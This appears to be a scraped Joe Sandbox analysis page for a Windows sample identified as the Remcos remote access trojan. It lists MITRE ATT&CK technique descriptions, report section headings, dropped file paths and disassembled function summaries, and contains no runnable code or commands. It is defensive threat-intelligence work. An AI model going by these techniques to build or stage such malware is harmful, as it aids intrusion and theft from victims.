Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report x6yDsHJ9tr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\remcos\logs.dat

C:\Users\user\AppData\Local\Temp\Setup.ini

C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat

C:\Users\user\AppData\Local\Temp\nspD8D5.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsuD809.tmp

C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet\bttefulde.tox

C:\Users\user\eftermodnendes\ringeagt\Respecialisters\Daystars216.tre

C:\Users\user\eftermodnendes\ringeagt\Respecialisters\Skvinge18.alt

C:\Users\user\eftermodnendes\ringeagt\Respecialisters\Vaelger.Abr

C:\Users\user\eftermodnendes\ringeagt\Respecialisters\gramaries.Ove

Windows Analysis Report
x6yDsHJ9tr.exe

Function 00403645 Relevance: 88.0, APIs: 32, Strings: 18, Instructions: 464
stringfilecomCOMMON

Function 00405D8E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00406DA0 Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Function 00403D54 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 004030D5 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 204
memoryCOMMON

Function 004066BF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 00406A06 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Function 73471817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Function 004020DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73
libraryCOMMON

Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Function 004061A1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre